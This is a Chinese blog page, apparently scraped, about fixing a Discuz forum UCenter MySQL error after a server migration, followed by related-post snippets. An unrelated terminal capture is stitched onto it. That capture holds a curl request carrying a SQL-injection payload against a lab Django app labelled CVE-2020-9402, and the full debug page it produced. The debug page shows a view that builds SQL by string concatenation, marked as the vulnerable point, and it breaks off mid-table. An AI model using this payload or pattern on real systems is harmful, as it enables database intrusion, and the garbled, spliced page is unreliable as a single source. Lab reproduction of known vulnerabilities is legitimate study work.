dz论坛SQL:SELECT value FROM [Table]vars WHERE name=\'noteexists1\'解决方法

最新推荐文章于 2024-08-13 19:13:09 发布
原创 最新推荐文章于 2024-08-13 19:13:09 发布 · 4.9k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文解决dz论坛迁移服务器后无法登录后台的问题,涉及ucenter数据库链接文件配置错误导致的异常情况,通过修改数据库名称实现故障排除。

dz论坛SQL:SELECT value FROM [Table]vars WHERE name=noteexists1解决方法 - 临沂网络公司 - 临沂网站建设
 
dz论坛迁服务器,数据库表都已经导入,前台页面也能够显示,但无法登陆后台,出现如下登陆提示:

UCenter info: MySQL Query Error
SQL:SELECT value FROM [Table]vars WHERE name='noteexists1'
Error:Table 'ultrax.pre_ucenter_vars' doesn't exist
Errno:1146

通常出现这个原因是因为ucenter数据库链接文件有问题,找到"/config/config_ucenter.php"打开找到
define('UC_DBTABLEPRE', '`ultrax`.pre_ucenter_');
既然提示ultrax.pre_ucenter_vars不存在肯定是这里有问题,改之ultrax换成现在的dbname。

注:如果改了这个还不行,建议去找找"/uc_server"下的数据库链接文件,改下数据库名。
select value from v$diag_info where name='Default Trace File';
zhaoyangjian724的专栏
06-13 1204
VALUE -------------------------------------------------------------------------------- /u01/diag/rdbms/wilson/wilson/trace/wilson_ora_9101.trc
MySQL查询错误:SQL:从MySQL表中选择值
SrySmalltalk的博客
10-03 228
本文讨论了一种常见的MySQL查询错误,并提供了解决方案来解决该问题。通过仔细检查表名、数据库选择和表的存在性,您可以解决这些问题并成功执行所需的查询。请将"your_database_name"替换为实际的数据库名称,将"your_table_name"替换为实际的表名。数据库选择错误:如果在查询中未指定数据库名称,或者选择的数据库与表不匹配,也可能导致此错误。这个查询的目的是从名为"Table"的MySQL表中选择"value"列的数据。表名错误:请确保在SQL查询中使用的表名是正确的。
UCenter info: MySQL Query Error SQL:SELECT value FROM [Table]vars WHERE noteexists
12-15
大家先看下数据库权限问题,然后再进行如下操作。SQL:SELECT value FROM [Table]vars WHERE name=’noteexists2′ UCenter info: MySQL Query Error SQL:SELECT value FROM [Table]vars WHERE name=’noteexists2′ Error:SELECT command denied to user ‘数据库‘@’IP地址’ for table ‘pre_ucenter_vars’ Errno:1142 帮人迁移discuz,原以为很简单,数据导出,数据导入,修改uc_serve
UCenter info: MySQL Query Error SQL:SELECT value FROM [Table]vars WHERE name=’noteexists1′ 错误处理
凌乱博客
02-28 1551
使用Discuz论坛程序,一旦修改了数据库的密码,那么就需要修改对应配置文件中的密码才能正常使用 一般情况下Config目录下的两个php配置文件基本都会第一时间想到去修改,而且修改之后,论坛也能正常使用,但是这个时候论坛用户想要修改个人信息或者是更新头像,却发现不行。 出现这个问题,是因为还有一个地方的php配置文件需要修改,就是下面这个。 这个文件里面也有DBPW定义,也需要更改成为新的数据库密码,才能够正常使用。 ...
discuz搬家后报错SQL:SELECT value FROM [Table]vars WHERE name=’noteexists1′的解决办法
weixin_30765505的博客
06-02 890
基本上每个站长都会经历网站搬家,网站搬家中有时候就会遇到这次提到的这个错误数据库报错::SQL:SELECT value FROM [Table]vars WHERE name=\\\'noteexists1\\\'............... 我想大多数人碰到这样的情况,头皮就发麻了.. 呵呵... 到底肿么了呢?不都是按照了网上的教程一步一步来的了吗 ?为什么还会出错呢? 其实这...
zzz@zzz-virtual-machine:~/Desktop$ curl -H "Host: localhost" "http://192.168.20.128:8000/?geom=SRID=4326;SELECT%20version();--" <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="NONE,NOARCHIVE"> <title>OperationalError at /</title> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; background-color:#fff; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; } h2 { margin-bottom:.8em; } h3 { margin:1em 0 .5em 0; } h4 { margin:0 0 .5em 0; font-weight: normal; } code, pre { font-size: 100%; white-space: pre-wrap; } table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; } tbody td, tbody th { vertical-align:top; padding:2px 3px; } thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; } tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; } table.vars { margin:5px 0 2px 40px; } table.vars td, table.req td { font-family:monospace; } table td.code { width:100%; } table td.code pre { overflow:hidden; } table.source th { color:#666; } table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; } ul.traceback { list-style-type:none; color: #222; } ul.traceback li.frame { padding-bottom:1em; color:#4f4f4f; } ul.traceback li.user { background-color:#e0e0e0; color:#000 } div.context { padding:10px 0; overflow:hidden; } div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; } div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; } div.context ol li pre { display:inline; } div.context ol.context-line li { color:#464646; background-color:#dfdfdf; padding: 3px 2px; } div.context ol.context-line li span { position:absolute; right:32px; } .user div.context ol.context-line li { background-color:#bbb; color:#000; } .user div.context ol li { color:#666; } div.commands { margin-left: 40px; } div.commands a { color:#555; text-decoration:none; } .user div.commands a { color: black; } #summary { background: #ffc; } #summary h2 { font-weight: normal; color: #666; } #explanation { background:#eee; } #template, #template-not-exist { background:#f6f6f6; } #template-not-exist ul { margin: 0 0 10px 20px; } #template-not-exist .postmortem-section { margin-bottom: 3px; } #unicode-hint { background:#eee; } #traceback { background:#eee; } #requestinfo { background:#f6f6f6; padding-left:120px; } #summary table { border:none; background:transparent; } #requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; } #requestinfo h3 { margin-bottom:-1em; } .error { background: #ffc; } .specific { color:#cc3300; font-weight:bold; } h2 span.commands { font-size:.7em; font-weight:normal; } span.commands a:link {color:#5E5694;} pre.exception_value { font-family: sans-serif; color: #575757; font-size: 1.5em; margin: 10px 0 10px 0; } .append-bottom { margin-bottom: 10px; } </style> <script type="text/javascript"> function hideAll(elems) { for (var e = 0; e < elems.length; e++) { elems[e].style.display = 'none'; } } window.onload = function() { hideAll(document.querySelectorAll('table.vars')); hideAll(document.querySelectorAll('ol.pre-context')); hideAll(document.querySelectorAll('ol.post-context')); hideAll(document.querySelectorAll('div.pastebin')); } function toggle() { for (var i = 0; i < arguments.length; i++) { var e = document.getElementById(arguments[i]); if (e) { e.style.display = e.style.display == 'none' ? 'block': 'none'; } } return false; } function varToggle(link, id) { toggle('v' + id); var s = link.getElementsByTagName('span')[0]; var uarr = String.fromCharCode(0x25b6); var darr = String.fromCharCode(0x25bc); s.textContent = s.textContent == uarr ? darr : uarr; return false; } function switchPastebinFriendly(link) { s1 = "Switch to copy-and-paste view"; s2 = "Switch back to interactive view"; link.textContent = link.textContent.trim() == s1 ? s2: s1; toggle('browserTraceback', 'pastebinTraceback'); return false; } </script> </head> <body> <div id="summary"> <h1>OperationalError at /</h1> <pre class="exception_value">no such column: None</pre> <table class="meta"> <tr> <th>Request Method:</th> <td>GET</td> </tr> <tr> <th>Request URL:</th> <td>http://localhost/?geom=SRID=4326;SELECT%20version();--</td> </tr> <tr> <th>Django Version:</th> <td>3.0.3</td> </tr> <tr> <th>Exception Type:</th> <td>OperationalError</td> </tr> <tr> <th>Exception Value:</th> <td><pre>no such column: None</pre></td> </tr> <tr> <th>Exception Location:</th> <td>/root/django_cve_2020_9402/app/views.py in index, line 10</td> </tr> <tr> <th>Python Executable:</th> <td>/usr/bin/python3</td> </tr> <tr> <th>Python Version:</th> <td>3.10.12</td> </tr> <tr> <th>Python Path:</th> <td><pre>['/root/django_cve_2020_9402', '/usr/lib/python310.zip', '/usr/lib/python3.10', '/usr/lib/python3.10/lib-dynload', '/usr/local/lib/python3.10/dist-packages', '/usr/lib/python3/dist-packages']</pre></td> </tr> <tr> <th>Server time:</th> <td>Sun, 30 Nov 2025 15:18:38 +0000</td> </tr> </table> </div> <div id="traceback"> <h2>Traceback <span class="commands"><a href="#" onclick="return switchPastebinFriendly(this);"> Switch to copy-and-paste view</a></span> </h2> <div id="browserTraceback"> <ul class="traceback"> <li class="frame django"> <code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py</code> in <code>inner</code> <div class="context" id="c139322623517440"> <ol start="27" class="pre-context" id="pre139322623517440"> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> This decorator is automatically applied to all middleware to ensure that</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> no middleware leaks an exception and that the next middleware in the stack</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> can rely on getting a response instead of an exception.</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> """</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> @wraps(get_response)</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> def inner(request):</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> try:</pre></li> </ol> <ol start="34" class="context-line"> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> response = get_response(request)</pre> <span>…</span></li> </ol> <ol start='35' class="post-context" id="post139322623517440"> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> except Exception as exc:</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> response = response_for_exception(request, exc)</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> return response</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> return inner</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre></pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre></pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623517440')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623517440"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>exc</td> <td class="code"><pre>OperationalError('no such column: None')</pre></td> </tr> <tr> <td>get_response</td> <td class="code"><pre><bound method BaseHandler._get_response of <django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0>></pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> </tbody> </table> </li> <li class="frame django"> <code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code> <div class="context" id="c139322623522112"> <ol start="108" class="pre-context" id="pre139322623522112"> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> break</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre></pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> wrapped_callback = self.make_view_atomic(callback)</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> try:</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> except Exception as e:</pre></li> </ol> <ol start="115" class="context-line"> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> response = self.process_exception_by_middleware(e, request)</pre> <span>…</span></li> </ol> <ol start='116' class="post-context" id="post139322623522112"> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre></pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> # Complain if the view returned None (a common error).</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> if isinstance(callback, types.FunctionType): # FBV</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> view_name = callback.__name__</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> else: # CBV</pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623522112')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623522112"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> <tr> <td>callback_args</td> <td class="code"><pre>()</pre></td> </tr> <tr> <td>callback_kwargs</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>middleware_method</td> <td class="code"><pre><bound method CsrfViewMiddleware.process_view of <django.middleware.csrf.CsrfViewMiddleware object at 0x7eb69376d660>></pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> <tr> <td>resolver</td> <td class="code"><pre><URLResolver 'vuln.urls' (None:None) '^/'></pre></td> </tr> <tr> <td>resolver_match</td> <td class="code"><pre>ResolverMatch(func=app.views.index, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[], route=)</pre></td> </tr> <tr> <td>response</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>self</td> <td class="code"><pre><django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0></pre></td> </tr> <tr> <td>wrapped_callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> </tbody> </table> </li> <li class="frame django"> <code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code> <div class="context" id="c139322623521664"> <ol start="106" class="pre-context" id="pre139322623521664"> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> response = middleware_method(request, callback, callback_args, callback_kwargs)</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if response:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> break</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre></pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> wrapped_callback = self.make_view_atomic(callback)</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> try:</pre></li> </ol> <ol start="113" class="context-line"> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre> <span>…</span></li> </ol> <ol start='114' class="post-context" id="post139322623521664"> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> except Exception as e:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> response = self.process_exception_by_middleware(e, request)</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre></pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> # Complain if the view returned None (a common error).</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if isinstance(callback, types.FunctionType): # FBV</pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623521664')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623521664"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> <tr> <td>callback_args</td> <td class="code"><pre>()</pre></td> </tr> <tr> <td>callback_kwargs</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>middleware_method</td> <td class="code"><pre><bound method CsrfViewMiddleware.process_view of <django.middleware.csrf.CsrfViewMiddleware object at 0x7eb69376d660>></pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> <tr> <td>resolver</td> <td class="code"><pre><URLResolver 'vuln.urls' (None:None) '^/'></pre></td> </tr> <tr> <td>resolver_match</td> <td class="code"><pre>ResolverMatch(func=app.views.index, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[], route=)</pre></td> </tr> <tr> <td>response</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>self</td> <td class="code"><pre><django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0></pre></td> </tr> <tr> <td>wrapped_callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> </tbody> </table> </li> <li class="frame user"> <code>/root/django_cve_2020_9402/app/views.py</code> in <code>index</code> <div class="context" id="c139322623518016"> <ol start="3" class="pre-context" id="pre139322623518016"> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre>import sqlite3</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre></pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre>def index(request):</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> id = request.GET.get('id')</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> # 漏洞点:直接拼接 SQL,触发注入</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> conn = sqlite3.connect('db.sqlite3')</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> cursor = conn.cursor()</pre></li> </ol> <ol start="10" class="context-line"> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> cursor.execute(f"SELECT id, name FROM app_userinfo WHERE id = {id}")</pre> <span>…</span></li> </ol> <ol start='11' class="post-context" id="post139322623518016"> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> results = cursor.fetchall()</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> conn.close()</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> data = [{'id': row[0], 'name': row[1]} for row in results]</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> return JsonResponse(data, safe=False)</pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623518016')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623518016"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>conn</td> <td class="code"><pre><sqlite3.Connection object at 0x7eb694722d40></pre></td> </tr> <tr> <td>cursor</td> <td class="code"><pre><sqlite3.Cursor object at 0x7eb693681040></pre></td> </tr> <tr> <td>id</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> </tbody> </table> </li> </ul> </div> <form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post"> <div id="pastebinTraceback" class="pastebin"> <input type="hidden" name="language" value="PythonConsole"> <input type="hidden" name="title" value="OperationalError at /"> <input type="hidden" name="source" value="Django Dpaste Agent"> <input type="hidden" name="poster" value="Django"> <textarea name="content" id="traceback_area" cols="140" rows="25"> Environment: Request Method: GET Request URL: http://localhost/?geom=SRID=4326;SELECT%20version();-- Django Version: 3.0.3 Python Version: 3.10.12 Installed Applications: ['django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'app'] Installed Middleware: ['django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware'] Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/root/django_cve_2020_9402/app/views.py", line 10, in index cursor.execute(f"SELECT id, name FROM app_userinfo WHERE id = {id}") Exception Type: OperationalError at / Exception Value: no such column: None </textarea> <br><br> <input type="submit" value="Share this traceback on a public website"> </div> </form> </div> <div id="requestinfo"> <h2>Request information</h2> <h3 id="user-info">USER</h3> <p>AnonymousUser</p> <h3 id="get-info">GET</h3> <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>geom</td> <td class="code"><pre>'SRID=4326'</pre></td> </tr> <tr> <td>SELECT version()</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>--</td> <td class="code"><pre>''</pre></td> </tr> </tbody> </table> <h3 id="post-info">POST</h3> <p>No POST data</p> <h3 id="files-info">FILES</h3> <p>No FILES data</p> <h3 id="cookie-info">COOKIES</h3> <p>No cookie data</p> <h3 id="meta-info">META</h3> <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>COLORTERM</td> <td class="code"><pre>'truecolor'</pre></td> </tr> <tr> <td>CONTENT_LENGTH</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>CONTENT_TYPE</td> <td class="code"><pre>'text/plain'</pre></td> </tr> <tr> <td>DEBUGINFOD_URLS</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>DISPLAY</td> <td class="code"><pre>':0'</pre></td> </tr> <tr> <td>DJANGO_SETTINGS_MODULE</td> <td class="code"><pre>'vuln.settings'</pre></td> </tr> <tr> <td>GATEWAY_INTERFACE</td> <td class="code"><pre>'CGI/1.1'</pre></td> </tr> <tr> <td>HOME</td> <td class="code"><pre>'/root'</pre></td> </tr> <tr> <td>HTTP_ACCEPT</td> <td class="code"><pre>'*/*'</pre></td> </tr> <tr> <td>HTTP_HOST</td> <td class="code"><pre>'localhost'</pre></td> </tr> <tr> <td>HTTP_USER_AGENT</td> <td class="code"><pre>'curl/7.81.0'</pre></td> </tr> <tr> <td>LANG</td> <td class="code"><pre>'en_US.UTF-8'</pre></td> </tr> <tr> <td>LANGUAGE</td> <td class="code"><pre>'en_US:'</pre></td> </tr> <tr> <td>LC_ADDRESS</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_IDENTIFICATION</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_MEASUREMENT</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_MONETARY</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_NAME</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_NUMERIC</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_PAPER</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_TELEPHONE</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_TIME</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LESSCLOSE</td> <td class="code"><pre>'/usr/bin/lesspipe %s %s'</pre></td> </tr> <tr> <td>LESSOPEN</td> <td class="code"><pre>'| /usr/bin/lesspipe %s'</pre></td> </tr> <tr> <td>LOGNAME</td> <td class="code"><pre>'root'</pre></td> </tr> <tr> <td>LS_COLORS</td> <td class="code"><pre>'rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:'</pre></td> </tr> <tr> <td>MAIL</td> <td class="code"><pre>'/var/mail/root'</pre></td> </tr> <tr> <td>OLDPWD</td> <td class="code"><pre>'/root/vulhub/django/CVE-2020-9402/src'</pre></td> </tr> <tr> <td>PATH</td> <td class="code"><pre>'/xp/server/docker:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/xp/server/docker'</pre></td> </tr> <tr> <td>PATH_INFO</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>PWD</td> <td class="code"><pre>'/root/django_cve_2020_9402'</pre></td> </tr> <tr> <td>QUERY_STRING</td> <td class="code"><pre>'geom=SRID=4326;SELECT%20version();--'</pre></td> </tr> <tr> <td>REMOTE_ADDR</td> <td class="code"><pre>'192.168.20.128'</pre></td> </tr> <tr> <td>REMOTE_HOST</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>REQUEST_METHOD</td> <td class="code"><pre>'GET'</pre></td> </tr> <tr> <td>RUN_MAIN</td> <td class="code"><pre>'true'</pre></td> </tr> <tr> <td>SCRIPT_NAME</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>SERVER_NAME</td> <td class="code"><pre>'zzz-virtual-machine'</pre></td> </tr> <tr> <td>SERVER_PORT</td> <td class="code"><pre>'8000'</pre></td> </tr> <tr> <td>SERVER_PROTOCOL</td> <td class="code"><pre>'HTTP/1.1'</pre></td> </tr> <tr> <td>SERVER_SOFTWARE</td> <td class="code"><pre>'WSGIServer/0.2'</pre></td> </tr> <tr> <td>SHELL</td> <td class="code"><pre>'/bin/bash'</pre></td> </tr> <tr> <td>SHLVL</td> <td class="code"><pre>'1'</pre></td> </tr> <tr> <td>SUDO_COMMAND</td> <td class="code"><pre>'/bin/bash'</pre></td> </tr> <tr> <td>SUDO_GID</td> <td class="code"><pre>'1000'</pre></td> </tr> <tr> <td>SUDO_UID</td> <td class="code"><pre>'1000'</pre></td> </tr> <tr> <td>SUDO_USER</td> <td class="code"><pre>'zzz'</pre></td> </tr> <tr> <td>TERM</td> <td class="code"><pre>'xterm-256color'</pre></td> </tr> <tr> <td>TZ</td> <td class="code"><pre>'UTC'</pre></td> </tr> <tr> <td>USER</td> <td class="code"><pre>'root'</pre></td> </tr> <tr> <td>XAUTHORITY</td> <td class="code"><pre>'/run/user/1000/.mutter-Xwaylandauth.T2BDG3'</pre></td> </tr> <tr> <td>XDG_CURRENT_DESKTOP</td> <td class="code"><pre>'ubuntu:GNOME'</pre></td> </tr> <tr> <td>XDG_DATA_DIRS</td> <td class="code"><pre>'/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop'</pre></td> </tr> <tr> <td>_</td> <td class="code"><pre>'/usr/bin/python3'</pre></td> </tr> <tr> <td>wsgi.errors</td> <td class="code"><pre><_io.TextIOWrapper name='<stderr>' mode='w' encoding='utf-8'></pre></td> </tr> <tr> <td>wsgi.file_wrapper</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>wsgi.input</td> <td class="code"><pre><django.core.handlers.wsgi.LimitedStream object at 0x7eb69366d930></pre></td> </tr> <tr> <td>wsgi.multiprocess</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>wsgi.multithread</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>wsgi.run_once</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>wsgi.url_scheme</td> <td class="code"><pre>'http'</pre></td> </tr> <tr> <td>wsgi.version</td> <td class="code"><pre>(1, 0)</pre></td> </tr> </tbody> </table> <h3 id="settings-info">Settings</h3> <h4>Using settings module <code>vuln.settings</code></h4> <table class="req"> <thead> <tr> <th>Setting</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>ABSOLUTE_URL_OVERRIDES</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>ADMINS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>ALLOWED_HOSTS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>APPEND_SLASH</td> <td class="code"><pre>True</pre></td> </tr> 